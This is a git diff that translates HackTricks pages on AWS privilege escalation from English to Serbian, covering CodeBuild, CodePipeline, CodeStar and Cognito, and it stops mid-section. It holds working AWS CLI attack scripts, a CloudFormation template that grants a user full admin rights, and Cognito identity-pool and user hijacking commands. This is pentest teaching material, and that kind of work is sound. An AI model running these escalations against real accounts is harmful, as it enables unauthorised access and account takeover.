+Više detalja možete pronaći [ovde](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/).
 
-**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+**Potencijalni Uticaj:** Direktno privesc na priložene AWS Codebuild uloge.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
index 0662ae9e2..b00dc6605 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
@@ -4,7 +4,7 @@
 
 ## codepipeline
 
-For more info about codepipeline check:
+Za više informacija o codepipeline pogledajte:
 
 {{#ref}}
 ../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
@@ -12,13 +12,13 @@ For more info about codepipeline check:
 
 ### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution`
 
-When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them.
+Kada kreirate code pipeline, možete naznačiti **codepipeline IAM ulogu koju treba pokrenuti**, stoga ih možete kompromitovati.
 
-Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...)
+Pored prethodnih dozvola, biće vam potrebna **pristupna prava na mesto gde je kod smešten** (S3, ECR, github, bitbucket...)
 
-I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:`
+Testirao sam ovo radeći proces na veb stranici, prethodno navedene dozvole nisu List/Get one potrebne za kreiranje codepipeline, ali za kreiranje na vebu će vam takođe biti potrebne: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:`
 
-During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise:
+Tokom **kreiranja build projekta** možete naznačiti **komandu za izvršavanje** (rev shell?) i pokrenuti fazu izgradnje kao **privilegovan korisnik**, to je konfiguracija koju napadač treba da kompromituje:
 
 ![](<../../../images/image (276).png>)
 
@@ -26,16 +26,12 @@ During the **creation of the build project** you can indicate a **command to run
 
 ### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution`
 
-It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions.
+Možda će biti moguće izmeniti ulogu koja se koristi i komandu koja se izvršava na codepipeline sa prethodnim dozvolama.
 
 ### `codepipeline:pollforjobs`
 
-[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html):
+[AWS pominje](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html):
 
-> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**.
+> Kada se ovaj API pozove, CodePipeline **vraća privremene akreditive za S3 bucket** koji se koristi za skladištenje artefakata za pipeline, ako akcija zahteva pristup tom S3 bucketu za ulazne ili izlazne artefakte. Ovaj API takođe **vraća sve tajne vrednosti definisane za akciju**.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
index 387c6ffff..a819b56dc 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
@@ -4,7 +4,7 @@
 
 ## Codestar
 
-You can find more information about codestar in:
+Možete pronaći više informacija o codestar-u u:
 
 {{#ref}}
 codestar-createproject-codestar-associateteammember.md
@@ -12,7 +12,7 @@ codestar-createproject-codestar-associateteammember.md
 
 ### `iam:PassRole`, `codestar:CreateProject`
 
-With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page:
+Sa ovim dozvolama možete **zloupotrebiti codestar IAM ulogu** da izvršite **arbitrarne radnje** putem **cloudformation šablona**. Proverite sledeću stranicu:
 
 {{#ref}}
 iam-passrole-codestar-createproject.md
@@ -20,14 +20,13 @@ iam-passrole-codestar-createproject.md
 
 ### `codestar:CreateProject`, `codestar:AssociateTeamMember`
 
-This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**.
-
+Ova tehnika koristi `codestar:CreateProject` za kreiranje codestar projekta, i `codestar:AssociateTeamMember` da učini IAM korisnika **vlasnikom** novog CodeStar **projekta**, što će im omogućiti **novu politiku sa nekoliko dodatnih dozvola**.
 ```bash
 PROJECT_NAME="supercodestar"
 
 aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
-    --name $PROJECT_NAME \
-    --id $PROJECT_NAME
+--name $PROJECT_NAME \
+--id $PROJECT_NAME
 
 echo "Waiting 1min to start the project"
 sleep 60
@@ -35,15 +34,14 @@ sleep 60
 USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')
 
 aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
-    --project-id $PROJECT_NAME \
-    --user-arn "$USER_ARN" \
-    --project-role "Owner" \
-    --remote-access-allowed
+--project-id $PROJECT_NAME \
+--user-arn "$USER_ARN" \
+--project-role "Owner" \
+--remote-access-allowed
 ```
+Ako ste već **član projekta**, možete koristiti dozvolu **`codestar:UpdateTeamMember`** da **ažurirate svoju ulogu** na vlasnika umesto `codestar:AssociateTeamMember`.
 
-If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember`
-
-**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in:
+**Potencijalni uticaj:** Privesc na generisanu codestar politiku. Primer te politike možete pronaći u:
 
 {{#ref}}
 codestar-createproject-codestar-associateteammember.md
@@ -51,27 +49,23 @@ codestar-createproject-codestar-associateteammember.md
 
 ### `codestar:CreateProjectFromTemplate`
 
-1. **Create a New Project:**
-   - Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project.
-     - Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**.
-     - This access specifically targets a stack associated with the `CodeStarWorker--CloudFormation` IAM role.
-2. **Update the Target Stack:**
-   - With the granted CloudFormation permissions, proceed to update the specified stack.
-     - The stack's name will typically conform to one of two patterns:
-       - `awscodestar--infrastructure`
-       - `awscodestar--lambda`
-       - The exact name depends on the chosen template (referencing the example exploit script).
-3. **Access and Permissions:**
-   - Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack.
-   - Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.
+1. **Kreirajte novi projekat:**
+- Iskoristite akciju **`codestar:CreateProjectFromTemplate`** da započnete kreiranje novog projekta.
+- Nakon uspešnog kreiranja, pristup se automatski dodeljuje za **`cloudformation:UpdateStack`**.
+- Ovaj pristup se posebno odnosi na stog povezan sa `CodeStarWorker--CloudFormation` IAM ulogom.
+2. **Ažurirajte ciljni stog:**
+- Sa dodeljenim CloudFormation dozvolama, nastavite da ažurirate određeni stog.
+- Ime stoga će obično odgovarati jednom od dva obrasca:
+- `awscodestar--infrastructure`
+- `awscodestar--lambda`
+- Tačno ime zavisi od odabranog šablona (referišući se na primer skripte za eksploataciju).
+3. **Pristup i dozvole:**
+- Nakon ažuriranja, dobijate mogućnosti dodeljene **CloudFormation IAM ulozi** povezanoj sa stogom.
+- Napomena: Ovo ne pruža inherentno pune administratorske privilegije. Dodatni pogrešno konfigurisani resursi unutar okruženja mogu biti potrebni za dalju eskalaciju privilegija.
 
-For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\
-You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py)
+Za više informacija proverite originalno istraživanje: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\
+Eksploataciju možete pronaći na [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py)
 
-**Potential Impact:** Privesc to cloudformation IAM role.
+**Potencijalni uticaj:** Privesc na cloudformation IAM ulogu.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md
index 0de95738e..e94d30b6a 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md
@@ -2,84 +2,78 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-This is the created policy the user can privesc to (the project name was `supercodestar`):
-
+Ovo je kreirana politika kojoj korisnik može da eskalira privilegije (ime projekta je `supercodestar`):
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Sid": "1",
-      "Effect": "Allow",
-      "Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"],
-      "Resource": [
-        "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar",
-        "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent",
-        "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner"
-      ]
-    },
-    {
-      "Sid": "2",
-      "Effect": "Allow",
-      "Action": [
-        "codestar:DescribeUserProfile",
-        "codestar:ListProjects",
-        "codestar:ListUserProfiles",
-        "codestar:VerifyServiceRole",
-        "cloud9:DescribeEnvironment*",
-        "cloud9:ValidateEnvironmentName",
-        "cloudwatch:DescribeAlarms",
-        "cloudwatch:GetMetricStatistics",
-        "cloudwatch:ListMetrics",
-        "codedeploy:BatchGet*",
-        "codedeploy:List*",
-        "codestar-connections:UseConnection",
-        "ec2:DescribeInstanceTypeOfferings",
-        "ec2:DescribeInternetGateways",
-        "ec2:DescribeNatGateways",
-        "ec2:DescribeRouteTables",
-        "ec2:DescribeSecurityGroups",
-        "ec2:DescribeSubnets",
-        "ec2:DescribeVpcs",
-        "events:ListRuleNamesByTarget",
-        "iam:GetAccountSummary",
-        "iam:GetUser",
-        "iam:ListAccountAliases",
-        "iam:ListRoles",
-        "iam:ListUsers",
-        "lambda:List*",
-        "sns:List*"
-      ],
-      "Resource": ["*"]
-    },
-    {
-      "Sid": "3",
-      "Effect": "Allow",
-      "Action": [
-        "codestar:*UserProfile",
-        "iam:GenerateCredentialReport",
-        "iam:GenerateServiceLastAccessedDetails",
-        "iam:CreateAccessKey",
-        "iam:UpdateAccessKey",
-        "iam:DeleteAccessKey",
-        "iam:UpdateSSHPublicKey",
-        "iam:UploadSSHPublicKey",
-        "iam:DeleteSSHPublicKey",
-        "iam:CreateServiceSpecificCredential",
-        "iam:UpdateServiceSpecificCredential",
-        "iam:DeleteServiceSpecificCredential",
-        "iam:ResetServiceSpecificCredential",
-        "iam:Get*",
-        "iam:List*"
-      ],
-      "Resource": ["arn:aws:iam::947247140022:user/${aws:username}"]
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "1",
+"Effect": "Allow",
+"Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"],
+"Resource": [
+"arn:aws:codestar:eu-west-1:947247140022:project/supercodestar",
+"arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent",
+"arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner"
+]
+},
+{
+"Sid": "2",
+"Effect": "Allow",
+"Action": [
+"codestar:DescribeUserProfile",
+"codestar:ListProjects",
+"codestar:ListUserProfiles",
+"codestar:VerifyServiceRole",
+"cloud9:DescribeEnvironment*",
+"cloud9:ValidateEnvironmentName",
+"cloudwatch:DescribeAlarms",
+"cloudwatch:GetMetricStatistics",
+"cloudwatch:ListMetrics",
+"codedeploy:BatchGet*",
+"codedeploy:List*",
+"codestar-connections:UseConnection",
+"ec2:DescribeInstanceTypeOfferings",
+"ec2:DescribeInternetGateways",
+"ec2:DescribeNatGateways",
+"ec2:DescribeRouteTables",
+"ec2:DescribeSecurityGroups",
+"ec2:DescribeSubnets",
+"ec2:DescribeVpcs",
+"events:ListRuleNamesByTarget",
+"iam:GetAccountSummary",
+"iam:GetUser",
+"iam:ListAccountAliases",
+"iam:ListRoles",
+"iam:ListUsers",
+"lambda:List*",
+"sns:List*"
+],
+"Resource": ["*"]
+},
+{
+"Sid": "3",
+"Effect": "Allow",
+"Action": [
+"codestar:*UserProfile",
+"iam:GenerateCredentialReport",
+"iam:GenerateServiceLastAccessedDetails",
+"iam:CreateAccessKey",
+"iam:UpdateAccessKey",
+"iam:DeleteAccessKey",
+"iam:UpdateSSHPublicKey",
+"iam:UploadSSHPublicKey",
+"iam:DeleteSSHPublicKey",
+"iam:CreateServiceSpecificCredential",
+"iam:UpdateServiceSpecificCredential",
+"iam:DeleteServiceSpecificCredential",
+"iam:ResetServiceSpecificCredential",
+"iam:Get*",
+"iam:List*"
+],
+"Resource": ["arn:aws:iam::947247140022:user/${aws:username}"]
+}
+]
 }
 ```
-
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
index 891d72df5..5b9a423b0 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
@@ -2,42 +2,39 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**.
-
-To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**:
+Sa ovim dozvolama možete **zloupotrebiti codestar IAM ulogu** da izvršite **arbitrarne radnje** putem **cloudformation šablona**.
 
+Da biste to iskoristili, potrebno je da kreirate **S3 bucket koji je dostupan** iz napadnutog naloga. Učitajte datoteku pod nazivom `toolchain.json`. Ova datoteka treba da sadrži **cloudformation šablon za eksploataciju**. Sledeći može biti korišćen za postavljanje upravljane politike korisniku pod vašom kontrolom i **dodeljivanje admin dozvola**:
 ```json:toolchain.json
 {
-  "Resources": {
-    "supercodestar": {
-      "Type": "AWS::IAM::ManagedPolicy",
-      "Properties": {
-        "ManagedPolicyName": "CodeStar_supercodestar",
-        "PolicyDocument": {
-          "Version": "2012-10-17",
-          "Statement": [
-            {
-              "Effect": "Allow",
-              "Action": "*",
-              "Resource": "*"
-            }
-          ]
-        },
-        "Users": [""]
-      }
-    }
-  }
+"Resources": {
+"supercodestar": {
+"Type": "AWS::IAM::ManagedPolicy",
+"Properties": {
+"ManagedPolicyName": "CodeStar_supercodestar",
+"PolicyDocument": {
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": "*",
+"Resource": "*"
+}
+]
+},
+"Users": [""]
+}
+}
+}
 }
 ```
-
-Also **upload** this `empty zip` file to the **bucket**:
+Takođe **otpremite** ovu `praznu zip` datoteku u **bucket**:
 
 {% file src="../../../../images/empty.zip" %}
 
-Remember that the **bucket with both files must be accessible by the victim account**.
-
-With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project:
+Zapamtite da **bucket sa obe datoteke mora biti dostupan od strane naloga žrtve**.
 
+Sa obe stvari otpremljene, sada možete nastaviti sa **eksploatacijom** kreiranjem **codestar** projekta:
 ```bash
 PROJECT_NAME="supercodestar"
 
@@ -45,19 +42,19 @@ PROJECT_NAME="supercodestar"
 ## In this JSON the bucket and key (path) to the empry.zip file is used
 SOURCE_CODE_PATH="/tmp/surce_code.json"
 SOURCE_CODE="[
-    {
-        \"source\": {
-            \"s3\": {
-                \"bucketName\": \"privesc\",
-                \"bucketKey\": \"empty.zip\"
-            }
-    },
-        \"destination\": {
-            \"codeCommit\": {
-                \"name\": \"$PROJECT_NAME\"
-            }
-        }
-    }
+{
+\"source\": {
+\"s3\": {
+\"bucketName\": \"privesc\",
+\"bucketKey\": \"empty.zip\"
+}
+},
+\"destination\": {
+\"codeCommit\": {
+\"name\": \"$PROJECT_NAME\"
+}
+}
+}
 ]"
 printf "$SOURCE_CODE" > $SOURCE_CODE_PATH
 
@@ -65,28 +62,23 @@ printf "$SOURCE_CODE" > $SOURCE_CODE_PATH
 ## In this JSON the bucket and key (path) to the toolchain.json file is used
 TOOLCHAIN_PATH="/tmp/tool_chain.json"
 TOOLCHAIN="{
-    \"source\": {
-        \"s3\": {
-            \"bucketName\": \"privesc\",
-            \"bucketKey\": \"toolchain.json\"
-        }
-    },
-    \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\"
+\"source\": {
+\"s3\": {
+\"bucketName\": \"privesc\",
+\"bucketKey\": \"toolchain.json\"
+}
+},
+\"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\"
 }"
 printf "$TOOLCHAIN" > $TOOLCHAIN_PATH
 
 # Create the codestar project that will use the cloudformation epxloit to privesc
 aws codestar create-project \
-    --name $PROJECT_NAME \
-    --id $PROJECT_NAME \
-    --source-code file://$SOURCE_CODE_PATH \
-    --toolchain file://$TOOLCHAIN_PATH
+--name $PROJECT_NAME \
+--id $PROJECT_NAME \
+--source-code file://$SOURCE_CODE_PATH \
+--toolchain file://$TOOLCHAIN_PATH
 ```
-
-This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user.
+Ova eksploatacija se zasniva na **Pacu eksploataciji ovih privilegija**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) Na njemu možete pronaći varijaciju za kreiranje administrativne upravljane politike za ulogu umesto za korisnika.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md
index ddd0c1efd..1ccbe3597 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md
@@ -4,28 +4,27 @@
 
 ## Cognito
 
-For more info about Cognito check:
+Za više informacija o Cognitu pogledajte:
 
 {{#ref}}
 ../aws-services/aws-cognito-enum/
 {{#endref}}
 
-### Gathering credentials from Identity Pool
+### Prikupljanje kredencijala iz Identity Pool-a
 
-As Cognito can grant **IAM role credentials** to both **authenticated** an **unauthenticated** **users**, if you locate the **Identity Pool ID** of an application (should be hardcoded on it) you can obtain new credentials and therefore privesc (inside an AWS account where you probably didn't even have any credential previously).
+Pošto Cognito može dodeliti **IAM role credentials** i **autentifikovanim** i **neautentifikovanim** **korisnicima**, ako locirate **Identity Pool ID** aplikacije (trebalo bi da bude hardkodiran u njoj) možete dobiti nove kredencijale i tako izvršiti privesc (unutar AWS naloga gde verovatno niste imali nikakve kredencijale ranije).
 
-For more information [**check this page**](../aws-unauthenticated-enum-access/#cognito).
+Za više informacija [**proverite ovu stranicu**](../aws-unauthenticated-enum-access/#cognito).
 
-**Potential Impact:** Direct privesc to the services role attached to unauth users (and probably to the one attached to auth users).
+**Potencijalni uticaj:** Direktan privesc na usluge ulogu vezanu za neautentifikovane korisnike (i verovatno na onu vezanu za autentifikovane korisnike).
 
 ### `cognito-identity:SetIdentityPoolRoles`, `iam:PassRole`
 
-With this permission you can **grant any cognito role** to the authenticated/unauthenticated users of the cognito app.
-
+Sa ovom dozvolom možete **dodeliti bilo koju cognito ulogu** autentifikovanim/neautentifikovanim korisnicima cognito aplikacije.
 ```bash
 aws cognito-identity set-identity-pool-roles \
-    --identity-pool-id  \
-    --roles unauthenticated=
+--identity-pool-id  \
+--roles unauthenticated=
 
 # Get credentials
 ## Get one ID
@@ -33,286 +32,243 @@ aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-90
 ## Get creds for that id
 aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374"
 ```
+Ako cognito aplikacija **nema omogućene neautentifikovane korisnike**, možda će vam biti potrebna i dozvola `cognito-identity:UpdateIdentityPool` da je omogućite.
 
-If the cognito app **doesn't have unauthenticated users enabled** you might need also the permission `cognito-identity:UpdateIdentityPool` to enable it.
-
-**Potential Impact:** Direct privesc to any cognito role.
+**Potencijalni uticaj:** Direktno privesc na bilo koju cognito ulogu.
 
 ### `cognito-identity:update-identity-pool`
 
-An attacker with this permission could set for example a Cognito User Pool under his control or any other identity provider where he can login as a **way to access this Cognito Identity Pool**. Then, just **login** on that user provider will **allow him to access the configured authenticated role in the Identity Pool**.
-
+Napadač sa ovom dozvolom mogao bi, na primer, da postavi Cognito User Pool pod njegovom kontrolom ili bilo koji drugi provajder identiteta gde može da se prijavi kao **način za pristup ovoj Cognito Identity Pool**. Tada, samo **prijavljivanje** na tom provajderu korisnika će **omogućiti mu pristup konfigurisanom autentifikovanom ulozi u Identity Pool**.
 ```bash
 # This example is using a Cognito User Pool as identity provider
 ## but you could use any other identity provider
 aws cognito-identity update-identity-pool \
-    --identity-pool-id  \
-    --identity-pool-name  \
-    [--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \
-    --cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false
+--identity-pool-id  \
+--identity-pool-name  \
+[--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \
+--cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false
 
 # Now you need to login to the User Pool you have configured
 ## after having the id token of the login continue with the following commands:
 
 # In this step you should have already an ID Token
 aws cognito-identity get-id \
-    --identity-pool-id  \
-    --logins cognito-idp..amazonaws.com/=
+--identity-pool-id  \
+--logins cognito-idp..amazonaws.com/=
 
 # Get the identity_id from thr previous commnad response
 aws cognito-identity get-credentials-for-identity \
-    --identity-id  \
-    --logins cognito-idp..amazonaws.com/=
+--identity-id  \
+--logins cognito-idp..amazonaws.com/=
 ```
-
-It's also possible to **abuse this permission to allow basic auth**:
-
+Takođe je moguće **zloupotrebiti ovu dozvolu da se omogući osnovna autentifikacija**:
 ```bash
 aws cognito-identity update-identity-pool \
-    --identity-pool-id  \
-    --identity-pool-name  \
-    --allow-unauthenticated-identities
-    --allow-classic-flow
+--identity-pool-id  \
+--identity-pool-name  \
+--allow-unauthenticated-identities
+--allow-classic-flow
 ```
-
-**Potential Impact**: Compromise the configured authenticated IAM role inside the identity pool.
+**Potencijalni uticaj**: Kompromitovanje konfigurisanog autentifikovanog IAM naloga unutar identitetskog bazena.
 
 ### `cognito-idp:AdminAddUserToGroup`
 
-This permission allows to **add a Cognito user to a Cognito group**, therefore an attacker could abuse this permission to add an user under his control to other groups with **better** privileges or **different IAM roles**:
-
+Ova dozvola omogućava **dodavanje Cognito korisnika u Cognito grupu**, stoga bi napadač mogao zloupotrebiti ovu dozvolu da doda korisnika pod njegovom kontrolom u druge grupe sa **boljim** privilegijama ili **različitim IAM nalozima**:
 ```bash
 aws cognito-idp admin-add-user-to-group \
-    --user-pool-id  \
-    --username  \
-    --group-name 
+--user-pool-id  \
+--username  \
+--group-name 
 ```
-
-**Potential Impact:** Privesc to other Cognito groups and IAM roles attached to User Pool Groups.
+**Potencijalni Uticaj:** Privesc na druge Cognito grupe i IAM uloge povezane sa User Pool Grupama.
 
 ### (`cognito-idp:CreateGroup` | `cognito-idp:UpdateGroup`), `iam:PassRole`
 
-An attacker with these permissions could **create/update groups** with **every IAM role that can be used by a compromised Cognito Identity Provider** and make a compromised user part of the group, accessing all those roles:
-
+Napadač sa ovim dozvolama mogao bi **da kreira/aktualizuje grupe** sa **svakom IAM ulogom koja može biti korišćena od strane kompromitovanog Cognito Identity Providera** i učiniti kompromitovanog korisnika delom grupe, pristupajući svim tim ulogama:
 ```bash
 aws cognito-idp create-group --group-name Hacked --user-pool-id  --role-arn 
 ```
-
-**Potential Impact:** Privesc to other Cognito IAM roles.
+**Potencijalni uticaj:** Privesc na druge Cognito IAM uloge.
 
 ### `cognito-idp:AdminConfirmSignUp`
 
-This permission allows to **verify a signup**. By default anyone can sign in Cognito applications, if that is left, a user could create an account with any data and verify it with this permission.
-
+Ova dozvola omogućava **verifikaciju registracije**. Po defaultu, svako može da se prijavi na Cognito aplikacije; ako to ostane, korisnik bi mogao da kreira nalog sa bilo kojim podacima i verifikuje ga ovom dozvolom.
 ```bash
 aws cognito-idp admin-confirm-sign-up \
-    --user-pool-id  \
-    --username 
+--user-pool-id  \
+--username 
 ```
-
-**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users if you can register a new user. Indirect privesc to other app functionalities being able to confirm any account.
+**Potencijalni uticaj:** Indirektno privesc na IAM ulogu identiteta za autentifikovane korisnike ako možete registrovati novog korisnika. Indirektno privesc na druge funkcionalnosti aplikacije omogućavajući potvrdu bilo kog naloga.
 
 ### `cognito-idp:AdminCreateUser`
 
-This permission would allow an attacker to create a new user inside the user pool. The new user is created as enabled, but will need to change its password.
-
+Ova dozvola bi omogućila napadaču da kreira novog korisnika unutar korisničkog bazena. Novi korisnik se kreira kao omogućen, ali će morati da promeni svoju lozinku.
 ```bash
 aws cognito-idp admin-create-user \
-    --user-pool-id  \
-    --username  \
-    [--user-attributes ] ([Name=email,Value=email@gmail.com])
-    [--validation-data ]
-    [--temporary-password ]
+--user-pool-id  \
+--username  \
+[--user-attributes ] ([Name=email,Value=email@gmail.com])
+[--validation-data ]
+[--temporary-password ]
 ```
-
-**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user
+**Potencijalni uticaj:** Direktni privesc na IAM ulogu identitetskog bazena za autentifikovane korisnike. Indirektni privesc na druge funkcionalnosti aplikacije omogućavajući kreiranje bilo kog korisnika.
 
 ### `cognito-idp:AdminEnableUser`
 
-This permissions can help in. a very edge-case scenario where an attacker found the credentials of a disabled user and he needs to **enable it again**.
-
+Ova dozvola može pomoći u veoma specifičnom scenariju gde je napadač pronašao akreditive onemogućenog korisnika i treba da ga **ponovo omogući**.
 ```bash
 aws cognito-idp admin-enable-user \
-    --user-pool-id  \
-    --username 
+--user-pool-id  \
+--username 
 ```
-
-**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users and permissions of the user if the attacker had credentials for a disabled user.
+**Potencijalni uticaj:** Indirektno privesc na IAM ulogu identiteta za autentifikovane korisnike i dozvole korisnika ako je napadač imao akreditive za onemogućenog korisnika.
 
 ### `cognito-idp:AdminInitiateAuth`, **`cognito-idp:AdminRespondToAuthChallenge`**
 
-This permission allows to login with the [**method ADMIN_USER_PASSWORD_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** For more information follow the link.
+Ova dozvola omogućava prijavu putem [**metode ADMIN_USER_PASSWORD_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** Za više informacija pratite link.
 
 ### `cognito-idp:AdminSetUserPassword`
 
-This permission would allow an attacker to **change the password of any user**, making him able to impersonate any user (that doesn't have MFA enabled).
-
